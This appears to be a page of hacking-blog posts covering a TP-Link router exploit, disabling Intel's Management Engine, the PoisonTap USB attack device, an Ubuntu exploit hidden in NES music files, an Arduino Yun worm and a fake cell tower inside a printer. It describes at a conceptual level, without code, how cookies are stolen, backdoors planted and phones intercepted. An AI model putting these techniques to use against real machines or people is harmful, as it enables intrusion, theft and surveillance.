TP-Link Debug Protocol Gives Up Keys To Kingdom

If the headline makes today’s hack sound like it was easy, rest assured that it wasn’t. But if you’re interested in embedded device hacking, read on.

[Andres] wanted to install a custom OS firmware on a cheap home router, so he bought a router known to be reflashable only to find that the newer version of the firmware made that difficult. We’ve all been there. But instead of throwing the device in the closet, [Andres] beat it into submission, discovering a bug in the firmware, exploiting it, and writing it up for the manufacturer.  (And just as we’re going to press: posting the code for the downgrade exploit here.)

This is not a weekend hack — this took a professional many hours of serious labor. But it was made a lot easier because TP-Link left a debugging protocol active, listening on the LAN interface, and not requiring authentication. [Andres] found most of the information he needed in patents, and soon had debugging insight into the running device.

Continue reading “TP-Link Debug Protocol Gives Up Keys To Kingdom”

All I Want For Christmas Is A 4-Factor Biometric Lock Box

It’s the most wonderful time of the year! No, we’re not talking about the holiday season, although that certainly has its merits. What we mean is that it’s time for the final projects from [Bruce Land]’s ECE4760 class. With the giving spirit and their mothers in mind, [Adarsh], [Timon], and [Cameron] made a programmable lock box with four-factor authentication. That’s three factors more secure than your average Las Vegas hotel room safe, and with a display to boot.

Getting into this box starts with a four-digit code on a number pad. If it’s incorrect, the display will say so. Put in the right code and the system will wait four seconds for the next step, which involves three potentiometers. These are tuned to the correct value with a leeway of +/- 30. After another four-second wait, it’s on to the piezo-based knock detector, which listens for the right pattern. Finally, a fingerprint scanner makes sure that anyone who wants into this box had better plan ahead.

This project is based on Microchip’s PIC32-based Microstick II, which [Professor Land] starting teaching in 2015. It also uses an Arduino Uno to handle the fingerprint scanner. The team has marketability in mind for this project, and in the video after the break, they walk through the factory settings and user customization.

We have seen many ways to secure a lock box. How about a laser-cut combination safe or a box with a matching NFC ring?

Continue reading “All I Want For Christmas Is A 4-Factor Biometric Lock Box”

Neutralizing Intel’s Management Engine

Five or so years ago, Intel rolled out something horrible. Intel’s Management Engine (ME) is a completely separate computing environment running on Intel chipsets that has access to everything. The ME has network access, access to the host operating system, memory, and cryptography engine. The ME can be used remotely even if the PC is powered off. If that sounds scary, it gets even worse: no one knows what the ME is doing, and we can’t even look at the code. When — not ‘if’ — the ME is finally cracked open, every computer running on a recent Intel chip will have a huge security and privacy issue. Intel’s Management Engine is the single most dangerous piece of computer hardware ever created.

Researchers are continuing work on deciphering the inner workings of the ME, and we sincerely hope this Pandora’s Box remains closed. Until then, there’s now a new way to disable Intel’s Management Engine.

Previously, the first iteration of the ME found in GM45 chipsets could be removed. This technique was due to the fact the ME was located on a chip separate from the northbridge. For Core i3/i5/i7 processors, the ME is integrated to the northbridge. Until now, efforts to disable an ME this closely coupled to the CPU have failed. Completely removing the ME from these systems is impossible, however disabling parts of the ME are not. There is one caveat: if the ME’s boot ROM (stored in an SPI Flash) does not find a valid Intel signature, the PC will shut down after 30 minutes.

A few months ago, [Trammell Hudson] discovered erasing the first page of the ME region did not shut down his Thinkpad after 30 minutes. This led [Nicola Corna] and [Frederico Amedeo Izzo] to write a script that uses this exploit. Effectively, ME still thinks it’s running, but it doesn’t actually do anything.

With a BeagleBone, an SOIC-8 chip clip, and a few breakout wires, this script will run and effectively disable the ME. This exploit has only been confirmed to work on Sandy Bridge and Ivy Bridge processors. It should work on Skylake processors, and Haswell and Broadwell are untested.

Separating or disabling the ME from the CPU has been a major focus of the libreboot and coreboot communities. The inability to do so has, until now, made the future prospects of truly free computing platforms grim. The ME is in everything, and CPUs without an ME are getting old. Even though we don’t have the ability to remove the ME, disabling it is the next best thing.

PoisonTap Makes Raspberry Pi Zero Exploit Locked Computers

[Samy Kamkar], leet haxor extraordinaire, has taken a treasure trove of exploits and backdoors and turned it into a simple hardware device that hijacks all network traffic, enables remote access, and does it all while a machine is locked. It’s PoisonTap, and it’s based on the Raspberry Pi Zero for all that awesome tech blog cred we crave so much.

PoisonTap takes a Raspberry Pi Zero and configures it as a USB Gadget, emulating a network device. When this Pi-come-USB-to-Ethernet adapter is plugged into a computer (even a locked one), the computer sends out a DHCP request, and PoisonTap responds by telling the machine the entire IPv4 space is part of the Pi’s local network. All Internet traffic on the locked computer is then sent over PoisonTap, and if a browser is running on the locked computer, all requests are sent to this tiny exploit device.

With all network access going through PoisonTap, cookies are siphoned off, and the browser cache is poisoned with an exploit providing a WebSocket to the outside world. Even after PoisonTap is unplugged, an attacker can remotely send commands to the target computer and force the browser to execute JavaScript. From there, it’s all pretty much over.

Of course, any device designed to plug into a USB port and run a few exploits has a few limitations. PoisonTap only works if a browser is running. PoisonTap does not work on HTTPS cookies with the Secure cookie flag set. PoisonTap does not work if you have filled your USB ports with epoxy. There are a thousand limitations to PoisonTap, all of which probably don’t apply if you take PoisonTap into any office, plug it into a computer, and walk away. That is, after all, the point of this exploit.

As with all ub3r-1337 pen testing tools, we expect to see a version of PoisonTap for sale next August in the vendor area of DEF CON. Don’t buy it. A Raspberry Pi Zero costs $5, a USB OTG cable less than that, and all the code is available on Github. If you buy a device like PoisonTap, you are too technically illiterate to use it.

[Samy] has a demonstration of PoisonTap in the video below.

Continue reading “PoisonTap Makes Raspberry Pi Zero Exploit Locked Computers”

A Linux Exploit That Uses 6502 Code

With ubiquitous desktop computing now several decades old, anyone creating an operating system distribution now faces a backwards compatibility problem. Each upgrade brings its own set of new features, but it must maintain compatibility with the features of the previous versions or risk alienating users. If you are a critic of Microsoft products for their bloat, this is one of the factors behind that particular issue.

As well as a problem of compatibility, this extra software overhead creates one of security. A piece of code descended from a DOS word processor of the 1980s for example was not originally created with any idea that it might one day be hiding in a library on a machine visible to the entire world by the Internet. Our subject today is a good example, just such a vulnerability hiding in an old piece of code whose purpose is to maintain an obscure piece of backward compatibility. [Chris Evans] has demonstrated a vulnerability in an Ubuntu version by playing an NES music file that contains exploit code emulated by the player on a virtual 6502 processor.

The NES Sound Format is a music file standard that packages Nintendo game music for playback. It contains a scripting language, and it is this that is used to trigger the vulnerability. When you open an NSF file on the affected Ubuntu system it finds its way via your music player and the gstreamer multimedia framework to libgstnsf.so, a gstreamer plugin for playing NSF files.

Rather unbelievably, his plugin works by emulating a real 6502 as found in a NES to derive the musical output, and it is somewhere here that the vulnerability exists. So not only do we have layer upon layer of backward compatibility to play an obscure music file format, there is also a software emulation of some 8-bit silicon from the 1970s. [Chris] comments “Is that cool or what?“, and while we agree that a 6502 emulator buried in a modern distro is cool, we can’t help thinking something’s been lost along the way.

A proof-of-concept is provided for Ubuntu 12.04. It’s an older version, but he points out that while he thinks the most recent releases should not contain exactly the same vulnerability, it certainly exists in more than one still-supported version. There’s also a worrying twist in that due to the vagaries of Ubuntu’s file manager it auto-opens when its folder is accessed from the GUI. The year 2000 called, they want their auto-opening Windows ME worms back.

Sadly we suspect the 6502 lurking in this music player can’t be put to more general-purpose use. If you manage it, please do share it with us! But if emulated 6502s are your thing, take a look at this 150MHz 6502 co-processor for an Acorn BBC Micro that someone made using a Raspberry Pi.

[via r/hacking]

6502 image, Dirk Oppelt, (CC BY-SA 3.0) via Wikimedia Commons.

ArduWorm: A Malware For Your Arduino Yun

We’ve been waiting for this one. A worm was written for the Internet-connected Arduino Yun that gets in through a memory corruption exploit in the ATmega32u4 that’s used as the serial bridge. The paper (as PDF) is a bit technical, but if you’re interested, it’s a great read. (Edit: The link went dead. Here is our local copy.)

The crux of the hack is getting the AVR to run out of RAM, which more than a few of us have done accidentally from time to time. Here, the hackers write more and more data into memory until they end up writing into the heap, where data that’s used to control the program lives. Writing a worm for the AVR isn’t as easy as it was in the 1990’s on PCs, because a lot of the code that you’d like to run is in flash, and thus immutable. However, if you know where enough functions are located in flash, you can just use what’s there. These kind of return-oriented programming (ROP) tricks were enough for the researchers to write a worm.

In the end, the worm is persistent, can spread from Yun to Yun, and can do most everything that you’d love/hate a worm to do. In security, we all know that a chain is only as strong as its weakest link, and here the attack isn’t against the OpenWRT Linux system running on the big chip, but rather against the small AVR chip playing a support role. Because the AVR is completely trusted by the Linux system, once you’ve got that, you’ve won.

Will this amount to anything in practice? Probably not. There are tons of systems out there with much more easily accessed vulnerabilities: hard-coded passwords and poor encryption protocols. Attacking all the Yuns in the world wouldn’t be worth one’s time. It’s a very cool proof of concept, and in our opinion, that’s even better.

Thanks [Dave] for the great tip!

Stealth Cell Tower Inside This Office Printer Calls To Say I Love You

If you look around the street furniture of your city, you may notice some ingenious attempts to disguise cell towers. There are fake trees, lamp posts with bulges, and plenty you won’t even be aware of concealed within commercial signage. The same people who are often the first to complain when they have no signal it seems do not want to be reminded how that signal reaches them. On a more sinister note, government agencies have been known to make use of fake cell towers of a different kind, those which impersonate legitimate towers in order to track and intercept communications.

In investigating the phenomenon of fake cells, [Julian Oliver] has brought together both strands by creating a fake cell tower hidden within an innocuous office printer. It catches the phones it finds within its range, and sends them a series of text messages that appear to be from someone the phone’s owner might know. It then prints out a transcript of the resulting text conversation along with all the identifying information it can harvest from the phone. As a prank it also periodically calls phones connected to it and plays them the Stevie Wonder classic I Just Called To Say I Love You.

In hardware terms the printer has been fitted with a Raspberry Pi 3, a BladeRF software-defined transceiver, and a pair of omnidirectional antennas which are concealed behind the toner cartridge hatch. Software comes via  YateBTS, and [Julian] provides a significant amount of information about its configuration as well as a set of compiled binaries.

In one sense this project is a fun prank, yet on the other hand it demonstrates how accessible the technology now is to impersonate a cell tower and hijack passing phones. We’re afraid to speculate though as to the length of custodial sentence you might receive were you to be caught using one as a private individual.

We’ve considered the Stingray cell phone trackers before here at Hackaday, as well as looking at a couple of possible counter-measures. An app that uses a database of known towers to spot fakes, as well as a solution that relies on an SDR receiver to gather cell tower data from a neighbourhood.

[via Hacker News]